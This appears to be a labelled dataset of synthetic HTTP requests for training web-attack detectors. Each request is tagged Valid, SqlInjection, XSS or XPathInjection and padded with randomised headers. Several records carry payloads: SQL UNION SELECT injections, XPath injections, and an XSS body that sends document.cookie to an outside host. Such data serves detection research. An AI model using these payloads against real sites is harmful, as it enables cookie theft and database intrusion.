Accept-Language: atr2nt-aed3atd, j-hulRtra;q=0.1, 7tuT-l
Cache-Control: max-stale
Client-ip: 52.118.42.135
Cookie: lictMeO=ns 
Cookie2: $Version="691"
Date: Sat, 12 Sep 09 20:14:39 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 02 Dec 04 03:27:28 CET
If-Unmodified-Since: Mon, 21 Sep 09 05:31:25 CET
If-Match: "US6yND.1@Sd7N1n"
If-None-Match: *
If-Range: "gc_XYyzHgev@FjjJ"
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aW1lT2U6aWdzbm51a2g=
Range: 7-,5039-10447,-749
Referer: http://www.byhiv.biz/enndhO.wmn
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 1.2; ha-rm; rv:7.4.1) Gecko/56749616
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5667x180
Via: 4.1 www.wuoe.css
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: agn/0.4, vta7/4.8, rtn/3.1, o0tD/9.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43997
Start - Id: 42632
class: SqlInjection
GET /lex/_JYqUISbetweenHyuQRal/y1DmPPnrux1eEJc5/nQAutR6j9mPm4FN/Y2processing-instruction-PGImochaA/K5homedYc/e9lthneaeflrlaiMsnt1/8tdwoi4c31de1sbrIr/eo0J_GPnFev5k5/ghPmIewpe4Eshen/ttWWIF0no5sX.png?uarAm2l0dndcoo=unionpslieruy37%5Dt%7C&smhsas3idb=01260&X.processing-instructionDAu=940&ittoR=%27+UNION++++++++++ALL+++++++++SELECT+++++lhsa++FROM+++x71Tnya++WHERE+++%27%27+%3D++++%27 HTTP/1.1
Host: 57.69.91.97
Connection: keep-alive
Accept: video/*, video/*, text/html
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: identity;q=0.2, identity;q=0.4, deflate;q=0.3, identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 107.228.29.96
Cookie: r02s=tDb@;ib5sdms8srser=linDuy ntaccept ;JBIy=nae;dm6=1
Cookie2: $Version="596"
Date: Sun, 23 Dec 07 14:52:05 GMT
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Sun, 26 Oct 08 07:47:23 GMT
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "zp4dB826AD8r00J"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 4332
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM ZWllZ29tdHM2aXNvQXRybW9meWNkdHR1bjdlYWlsc29lbXROa210dGk=
Range: 72326-9838
Referer: /2uvth/altiucae/fritb/onani.php4
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 6.0; al-ri; rv:7.3.0) Gecko/80623256
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: Doasrc/0.8 www.pef4arn.css, FTP/5.9 www.thefi.png
Transfer-Encoding: soes8
Upgrade: xpnlin/0.7, nrmbin/0.8, 1tn7c/8.2, 0Hj/3.5, v2sh/4.3
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42632
Start - Id: 16714
class: Valid
GET /lsGnF97J-G/ar/noiwniril7htmpei/0@i1vmetaKN6.TmSadminK/co/cygiFdhgfu8/e8k9dBfa/ogxgnct/Csmno/kihKldDwC9DvVs7.jsp?2bsonCtrzgpd6a=1392 HTTP/1.1
Host: 178.9.100.113
Connection: ttlptz
Accept: image/jpeg, application/postscript;q=0.8, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 165.120.183.121
Cookie: goxYSt4=h;aen8nkM=UiOi;cdasrudejrocrCm=27855;to=s;QoptXT=gkUUm8;abrge=73909
Cookie2: $Version="51"
Date: Mon, 24 Jul 06 10:30:49 UTC
ETag: "lU3lW.mlpvrUFxzvnDj"
Expect: 100-continue
From: o6botttt@Meerth.org
If-Modified-Since: Sat, 01 Dec 07 06:58:07 CET
If-Unmodified-Since: Sun, 23 Jul 06 03:02:24 UTC
If-Match: *
If-None-Match: "H2bWnoMyFbZuvpT"
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 2
MIME-Version: 4.6
Pragma: a=dsrmgw
Proxy-Authorization: NTLM Y29kbXc0dXlob3VlZmVzcmQwZWFzdWhsaFJubm5oM2I1VGU=
Authorization: NTLM QWlud2VoYW9hdlJ3aWRub2RvaGhmWGVvNXlva2Vjc1hJZQ==
Range: 735-128151,-280736
Referer: /emli/z0not/ds1ibnS/utUe8S.conf
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: rRc9RRj http://www.imbrnag.st
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 021x3065
Via: FTP/9.4 161.134.167.156:43285, 8.7 www.1fon.shtml, HTTP/0.0 www.inACso.tiff
Transfer-Encoding: identity
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 635 111.175.4.37 "odotyu1nei7D" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 6672124414
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16714
Start - Id: 46883
class: XSS
POST /gyoNtweotn6pl2fse/sj5foGcAWwx5@6YmZ/7_nPl.VIFl/FB@k0access_log1Q1J9n/uSjqdxRHlE._o7OFRx/WMT5union-20ZH-HP8/m@IWAj0Iu0Xe4bQaph/iz9RAwt/yYnLvbcqPrU9M/r4XtUa73mDHLi-.asmx? HTTP/1.0
Content-Length: 260
Content-Language: dtcbt,rrfsn
Content-Encoding: gzip
Content-Location: http://otep0m.ch/dvlto/2p6a8/aaht7eym/hsECH/hEvi.jpg
Content-MD5: YWplZGU2YWhya3JwbXNoNg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: www.cltsH.be
Connection: close
Accept: audio/basic;q=0.0, video/*;q=0.7
Accept-Charset: windows-1258, windows-1255;q=0.1, iso-8859-1;q=0.7, iso-8859-15;q=0.4, iso-8859-1;q=0.4
Accept-Encoding: gzip;q=0.9, compress;q=0.3, gzip, deflate;q=0.1, identity;q=0.1
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 152.184.163.84
Cookie: alaTm=0851242;R@WulikeK=tt;soLwi=i-pGtHU;sEdokeOue5on=crsepSeo>tnph-teh
Cookie2: $Version="69"
Date: Sat, 25 Dec 04 17:42:50 CET
ETag: "2lelK@QzT6NAvfG"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: nbfea3@yM2KA0.biz
If-Modified-Since: Wed, 14 Feb 07 12:17:54 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic aHVlNFVTaTpkNW50aE50dw==
Authorization: Digest qop=auth
Range: -87,-41
Referer: http://www.jeeTtt.com/imisd/regeaLy/hh960aL/ahgb/etoEe.wmn
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: iZMAncY http://www.eesl.biz
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

KAJb=7082&5snetEet=3eDed oyunion&7tuj8nae6on=orUeg8liteIcl&tthr=<xml src =   "javascript:   [document.location.replace ('http://www.nend.com/cgi-bin/arst.cgi'+document.cookie);] "   >&Rt5yamM=fhtpasstla 43qq)ehae&bmotU=4

End - Id: 46883
Start - Id: 12919
class: Valid
GET /mNZD/nQY-g/TH@d14telnet9VB.msf? HTTP/1.0
Host: www.ErOq.be:30149
Connection: close
Accept: */*
Accept-Charset: euc-jp
Accept-Encoding: *
Accept-Language: uiiA-ifh5Hre;q=0.4
Cache-Control: min-fresh=1
Client-ip: 61.74.22.45
Cookie: gdnty=nb\t;snrtjetie=598
Cookie2: $Version="7"
Date: Sun, 28 Aug 05 18:52:21 CET
ETag: W/"7VP8CDaxhFcQDbUYJ_E"
Expect: 7aec=fctpot;Dtugi=n3aenhQi
From: iae8@9a7eojs.de
If-Modified-Since: Tue, 22 Dec 09 15:32:51 UTC
If-Unmodified-Since: Thu, 04 Jun 09 24:04:26 GMT
If-Match: *
If-None-Match: "FHZlW6eLZRHeX3f1hxZR"
If-Range: Mon, 16 Oct 06 23:37:01 UTC
Max-Forwards: 0
MIME-Version: 3.9
Pragma: e='AEe'
Proxy-Authorization: e1Ntj 3ahntdmE=coilaae
Authorization: Lnntst ieefont=ergg1nx0
Range: 976-,-97584
Referer: http://7eH9.be/69antds/xsnnpeaz/ngifraea/eikeuEo/ecmroort.fgf
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 8.1; td-n3; rv:4.5.6) Gecko/47558917
UA-CPU: Sparc
UA-Disp: 549,689,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: Ahtie/9.1 www.ifnot.png, 8.2 www.nnar.js, HTTP/7.0 87.63.85.242:7734
Transfer-Encoding: identity
Upgrade: eul/4.8, rnguen/8.4, trlsnm/4.9, eetr/3.8
Warning: 164 www.ctsc1.htm "Ieoeesci8Soustl6omhs" 
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12919
Start - Id: 48833
class: XPathInjection
GET /KAMJbetween15all8ZL/ASXXF/tbysapiwTddaios9te/uz9PW.cfm?c4soatscm=aetts&sahlsgcosou=7bdTa5%2Fs%2Ftf%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D027%5D+++++or++++%27x49anlcu%27+++%3D++%27&QFRL2o-B=3 HTTP/1.0
Host: 77.63.170.182
Connection: nheehi1
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: wIv-Some;q=0.7, oeoeh-ah;q=0.5, dt2lctux-c;q=0.6, n-8eflih;q=0.3
Cache-Control: 4er=dminhr
Client-ip: 35.113.99.20
Cookie: ufaaunoSn0wo=rah;hxp_Mcd6=23090263;sgs=1rz$tn ensh6e;axeeArke5Ad=icenghmKg;ahgfseoEngs7o=0
Cookie2: $Version="84"
Date: Fri, 28 Apr 06 16:57:32 CET
ETag: W/"Eot2OfllQboCmLby61Ro"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 21 Nov 08 06:18:53 GMT
If-Unmodified-Since: Sun, 19 Aug 07 23:23:59 UTC
If-Match: "gStRGvxsbRGO-IZH"
If-None-Match: *
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 7
MIME-Version: 5.3
Pragma: jhu=esindot
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: http://www.lgUe.it/31msEe8.tiff
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.4 (X11; U; Linux i586 1.8; tr-te; rv:1.4.9) Gecko/19539970
UA-CPU: StrongARM
UA-Disp: 6889,429,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 8.2 www.tlsshn0a.css
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48833
Start - Id: 11740
class: Valid
GET /vI/oulikhagiea/npF7-1sy8yiz3KLD/tG317f8/s7A.dmn/iQ7/qe/U9ES3Ll1G/na7M.tiff?kl0a7tfmu=nby8es&fKne7ghun=5154&ioesyfVtomiKr=eohd&nr0eceenka=tnhn6OItoeno&MWm57dpo=nupdatehdaaac&ostqtuntoiHwia=2291&Stkehaoeoc=083415&rd=94216312&uxf=rtor&iIhDSEj_=d6gt&tPo62se=xEPko-W2x HTTP/1.0
Host: www.7isAnQ.cz:7
Connection: ocdd
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: gaele-dT, 5e-icts;q=0.2, tdear-fcenl;q=0.6, sd7feotM-y1bAf, H-sah
Cache-Control: only-if-cached
Client-ip: 220.48.116.4
Cookie: cesddtrg=openfn5er:dropermO(pb;Od9onts6h=78
Cookie2: $Version="180"
Date: Sun, 19 Aug 07 05:31:59 GMT
ETag: "M4sS256TgoysWFX"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 21 Dec 05 03:17:29 GMT
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: "tKrQCqkB3qbqCPk"
If-None-Match: "zDy@ov.KjZtc2wb0-Z3"
If-Range: Mon, 18 Jan 10 18:06:28 UTC
Max-Forwards: 8448
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: NTLM WXJhdXJhdGlkbWVzblNpaXJyYnNvaWNyaG95ZXJyNmUz
Range: 1-,5-,24371-73606
Referer: /tneksIxi/dh9elX/5sr6Se6s.mspx
TE: trailers,chunked;q=0.6,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 4.9; Dm-me; rv:5.0.9) Gecko/79419476
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4702x1407
Via: 0kares/7.7 15.21.171.168, 1.7 185.196.195.102
Transfer-Encoding: compress
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 990 217.45.111.90 "utbxe9d4csrsohke" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11740
Start - Id: 4704
class: Valid
POST /Dk_D-KRj0Z.pl? HTTP/1.1
Content-Length: 203
Content-Language: bs9,oi
Content-Encoding: gzip
Content-Location: http://www.hhcafNeu.uk/otUlhtu/la9edgt/4Tqrgrb/sGami8y8.asp
Content-MD5: aHhuZXJhZWl1TlR5MElzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Feb 06 23:15:40 CET
Last-Modified: Thu, 08 May 08 03:06:23 GMT
Host: www.t4afed2ac.net
Connection: close
Accept: video/*;q=0.1, text/*, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: d2uour-dfhav
Cache-Control: utoin7='thhSQnea'
Client-ip: 208.150.105.233
Cookie: gRolw=mneoq
Cookie2: $Version="3"
Date: Mon, 12 Nov 07 11:04:30 CET
ETag: W/"snKD8.gVEgu6COXJftG"
Expect: mltE
From: duigdno@04ugaeaAe.biz
If-Modified-Since: Tue, 02 Aug 05 08:23:22 CET
If-Unmodified-Since: Sat, 25 Feb 06 10:24:06 CET
If-Match: "y-olhIhobls00@GT5sv0"
If-None-Match: *
If-Range: "QmMQuBoMJJIQciNgT.7"
Max-Forwards: 7678
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: tegTm hefxihhy=neebRy
Authorization: Digest uri=http://www.apl8fda.uk/aa8oesb.rar
Range: -242,-19368,124822-039647
Referer: http://axuy0G.org/o7isae.avi
TE: gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/3.2 (Windows; U; Win98 8.0; b5-bq; rv:5.0.8) Gecko/70887425
UA-CPU: Sparc
UA-Disp: 759,838,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2174x269
Via: 0.4 www.u2rn.gif:15954, 0.1 www.opanNh.jpg
Transfer-Encoding: deflate
Upgrade: lah/2.2
Warning: 523 162.78.234.235 "rtheene9A" 
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 669900608328585
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

gzctiI7=me7mar7&siepphzwsc=9169088075&2isEf=5241&nsTxT@7gco=818&odhfnuStdeo=135&n8Sqf7OT_wp=1&nkntnAtiAsSu4=tWbapassthruoafieRoeei&9e=7073&7dlstehi=s)thdfeo&AscLi=acb?moS8~<ttf&1T4_KKKVor=ta&te=3

End - Id: 4704
Start - Id: 23755
class: Valid
GET /edsl8Nahtdwnsnt/9GFA/oIc5ls4oionh/rqPHsvB/bdnegprHsAl4nn/y6wGhrls/i7emh0paBEojipc/e6/ich-5NxMd/sMn0-_b0wj/ceGDjf/obrnos.cgi?acis4dicv=RetnoTunph-dAc+ee&0mg1lrn2eamrce=Ssmucc&ni2amtoe=-+a HTTP/1.0
Host: 248.254.173.58
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: nhaEzu-mty, dl-rhdhhwne;q=0.3
Cache-Control: no-transform
Client-ip: 162.99.120.131
Cookie: oHjm2uechoOTw=00463;ubrrvrottoad=rfOVlY3b0;0araxe1e=z2ouha;jon2ts83e3Nl=cnIc
Cookie2: $Version="53"
Date: Sat, 15 Jan 05 15:56:19 GMT
ETag: W/"kQB1r0Z7TXZY@X_Ftb"
Expect: 100-continue
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: *
If-None-Match: "s3@N1uuo6knZl.cKh8X"
If-Range: *
Max-Forwards: 2650
MIME-Version: 5.6
Pragma: 34='ramIee'
Proxy-Authorization: Digest nonce
Authorization: hogier hrhcegnl=pc1asj
Range: 43983-6538,-2
Referer: http://vvcaxog.biz/eaden0ra/osyn.mpg
TE: trailers,deflate;q=0.4,trailers
Trailer: Proxy-Authorization
User-Agent: t6fwj/6.0.7.6
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 869x955
Via: 1.5 157.2.38.80, 3.7 134.194.107.84, 0.6 www.eteN.js
Transfer-Encoding: deflate
Upgrade: gal/4.2, ein/9.9, lhi/2.6, Iarfn/4.7
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 23755
Start - Id: 50017
class: XPathInjection
POST /2Qodaehaiag/Viix6p6gM/exlns/he/Tr/kUusamF/eQxMX6zIPTRa/uthsvtsaasBQdo6cpnQe/uiM1ULsE6QB87eoTma/txafzOUSO.cfm? HTTP/1.0
Content-Length: 192
Content-Language: fVsco,veiummi
Content-Encoding: compress
Content-Location: http://10eeheeg.biz/ohmr3/yapov57t.cgi
Content-MD5: UnRtZUhOb2NjbHN0aHN3dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 21:57:12 GMT
Last-Modified: Sun, 10 May 09 17:17:49 CET
Host: www.En3Dwaqap.ch
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: iXuce']    |  P   |    //user[  name/text(   )   =   'udlp
Cache-Control: max-age=816
Client-ip: 32.102.243.79
Cookie: paM2ebo3erEiol=96907;sus=at6$usqasoxle9t
Cookie2: $Version="2"
Date: Sat, 09 Aug 08 22:40:46 GMT
ETag: "JNImyIsVCIyz3habo"
Expect: A1a1ao=ix1nii;Dh5t
From: Ecil@targ.fr
If-Modified-Since: Sun, 09 Jan 05 15:36:24 CET
If-Unmodified-Since: Sat, 27 Nov 04 05:42:03 GMT
If-Match: "FwIsv.YKOL06J1pMQ"
If-None-Match: *
If-Range: "WFbd1obQ3PfhI5Ys"
Max-Forwards: 08
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic Y2JlZmZlcXM6aXJUYw==
Authorization: Basic ZWlucmo6dFllaGpuaQ==
Range: -28912,7700-34
Referer: /aF6aRnhi.jsp
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: inyciadstcplmewRab
UA-CPU: 68000
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9581x753
Via: FTP/6.6 www.atollqtt.htm, 2.7 www.sqs2yi.shtml
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 917 www.fiog.gif "Toqsuco" 
X-Forwarded-For: 84.189.52.115
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoyarosdOmeyeo=nohserviceserrgsM&t0km919zza=45099051&whs1zes6tal=hirukecopy&noariNnn=lstyle1&epycqesan9oElk=&l@&oaMee=erna&ksintkc1tsE=EnppgbgcRWa&rzqnllEeeewN=7eg&bia=hya&e4rTiee5=n8qmvuS

End - Id: 50017
Start - Id: 42692
class: SqlInjection
POST /fAC4tMLP/lVk0W-/eMooMvHgWZ/ym/iTasgRcwcm/sgH.9oUn.mdb? HTTP/1.1
Content-Length: 209
Content-Language: th
Content-Encoding: identity
Content-Location: /t6aoe9r/r82tw/hlafehh.tar
Content-MD5: OE9vOGFub1RvY21hZmhodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 03:58:38 UTC
Last-Modified: Sun, 13 Sep 09 18:01:48 GMT
Host: www.euifeL6ce.ch:80
Connection: keep-alive
Accept: audio/basic, image/jpeg
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: '  )     UNION     ALL    SELECT     5686,631,0,70,990 FROM    utr    WHERE (   ''    = '
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 2.85.208.252
Cookie: tc=m%-ejwheremochaj;uzine5egetfg=oed31lSiB8irdrt;aj=igiRJYU4QcwZ;48ai=34169940;i4w=[dor"i1 2"yi1ebnpositionnc
Cookie2: $Version="319"
Date: Mon, 03 Nov 08 06:44:18 GMT
ETag: "I8TX.xHK2VGc-Fb0iH0"
Expect: ptwle
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Mon, 15 Sep 08 23:45:40 GMT
If-Unmodified-Since: Tue, 27 Dec 05 21:10:05 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM NGFyNHRxbjRlc3RlNGFvcjRlOW9ybGxodHdlZ2lkOGhnaGk=
Authorization: NTLM bGFyc25kZWFic2tlbmlhZWRJZWVybmtub2VlZXl4cGl0dDEwb2NhSE8=
Range: 2455-
Referer: http://ttn1t.ch/Eaizw.avi
TE: deflate;q=0.5,deflate;q=0.0,gzip;q=0.4
User-Agent: Mozilla/1.7 (compatible; nsubunno; Linux i386; ueaInn; hlmted)
UA-Disp: 446,0818,16
UA-Color: color8
Via: huiy/0.4 www.hyke8l.htm, 1.2 www.ivRatel4.js
Transfer-Encoding: deflate
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 248 46.143.254.105 "nuealiiveobrbie" 
X-Serial-Number: 0088484140288112965
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nsty2hOt=buh6hx0Xq1&tl8esykerOiaai=1ag&DiEtphitHaaualo=d4ek_b&ul=rQ.0&Um@WB_UHw0=eetirb&orblercreax=passwdehometio&XBtopt=1796&lnj=(lstyle2i'fi&w5tsd=6&hcdngujteSAect=6196822&l5yml=uEHqi9loVs&mtee=71297725

End - Id: 42692
Start - Id: 9812
class: Valid
GET /atSciimzteikoFeNss/SeeetasdrItxt9/tmpKe6wp-5z/aqqE.LtkkBw6tX/rroqd/fX/nHr/7VUwnph-d-KJI/ez1K_jHpZ9EM/RdcS8.php?a57ihlnehlbHr=79003&S9dKXBLCJIA=35&amnmdemnmllzqea=AV6dsone%3A&osnppleeatttz=oXSIHDBBeu&hukgAueR=8352&dra=fegap%3Dh+%3De&inrd7rteirqh7s2=%2Bi&j3eqls3u=iinelikeeO+4i%3Ceupdatewabhy&SQn9zzD7LRNz=47368167&atzjfe=3778185&in=elewynastodddtAt&zts7f=124464&qt0cqiehbys=i&LO2RAG0A=8331 HTTP/1.0
Host: 40.164.111.216
Connection: close
Accept: video/*;q=0.0, text/xml;q=0.5
Accept-Charset: iso-8859-5;q=0.8, iso-8859-7
Accept-Encoding: gzip, gzip;q=0.3, compress, deflate;q=0.3, gzip
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 48.6.163.121
Cookie: lj-e5iZ=redxaredmxmlS=oo;opB8pvpJBri=od6vbscriptj t]se-viaccess_logth;ha8t=nH7gaiDZ;rendsqa1aoRdetx=ppvhtpassE hpasswdiasruoS;76=3eenT]enxlogeirt@?o\
Cookie2: $Version="5"
Date: Sat, 10 Mar 07 03:58:54 UTC
ETag: W/"rvGXJuKjElArHqEm7Xe9"
Expect: hyenHipf
From: hgnerso@teoal.uk
If-Modified-Since: Tue, 19 Oct 04 15:30:22 UTC
If-Unmodified-Since: Fri, 22 Jul 05 04:55:47 GMT
If-Match: *
If-None-Match: "mSIuerhC2S476r_-z79L"
If-Range: Fri, 13 Feb 09 12:24:59 UTC
Max-Forwards: 7
MIME-Version: 6.8
Pragma: dh7on2es=Emtet
Proxy-Authorization: Digest qop=dARhoRu
Authorization: ri2p OrmL=4c8aw
Range: -988,03-4,64-3
Referer: http://msrtlT.com/Iptni5g/hu42aen8/dgtes5/dnssoe/tseio.php4
TE: chunked,chunked;q=0.2,trailers
Trailer: If-Unmodified-Since
User-Agent: ceeanoi (evH4gDF; eL34Tes6eZ; c0@Rf-NteG; 88toId)
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: FTP/0.7 61.47.95.242:983, HTTP/8.1 18.242.135.146, 9.0 www.moyldst4.shtml
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 427 www.xeaxmra4.png "iNlnaytir" "Thu, 11 Jan 07 08:08:23 GMT"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 6447872326168450674
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9812
Start - Id: 30568
class: Valid
GET /zx@qrV409/osehbrt/Tpfli3P2EX.bin?FtKZP=ntBde&ZAri2mXmaRd=j%5D%3Eod&yopm3enres=xreaograp4qpn9&.LuiqAMmER=5113&sUrkorrno5hro=havingu&iz=5888528 HTTP/1.0
Host: www.sexn.de
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: macintosh, iso-8859-7;q=0.1, windows-1257;q=0.5
Accept-Encoding: 
Accept-Language: ac9Efi-ettie;q=0.3, vc8-TA, d-5AxseLo, 4oi2gfe-mxl, tc-h7dtocnr
Cache-Control: max-stale=3501
Client-ip: 61.132.5.63
Cookie: P1xtermF=41
Cookie2: $Version="14"
Date: Fri, 23 Apr 10 18:01:21 UTC
ETag: "lnDWAqRJOXogNjdpX"
Expect: td51xeI=atbj
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sat, 10 May 08 04:22:05 GMT
If-Unmodified-Since: Mon, 01 Feb 10 07:43:04 CET
If-Match: "S29SHH7hMUJrKW0-VhnU"
If-None-Match: "Lv_1_MrBPtLzjUG1L"
If-Range: Mon, 05 Dec 05 23:19:23 UTC
Max-Forwards: 0073
MIME-Version: 9.2
Pragma: Ssdlx=iwSstres
Proxy-Authorization: Digest qop=auth-int
Authorization: vltyl orcE=odoedaJl
Range: 592356-588
Referer: http://ominefda.st/drwu/E4aqveh/2ep4/mOioN.nsf
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 6.5; zl-xt; rv:9.7.6) Gecko/80924969
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5611x433
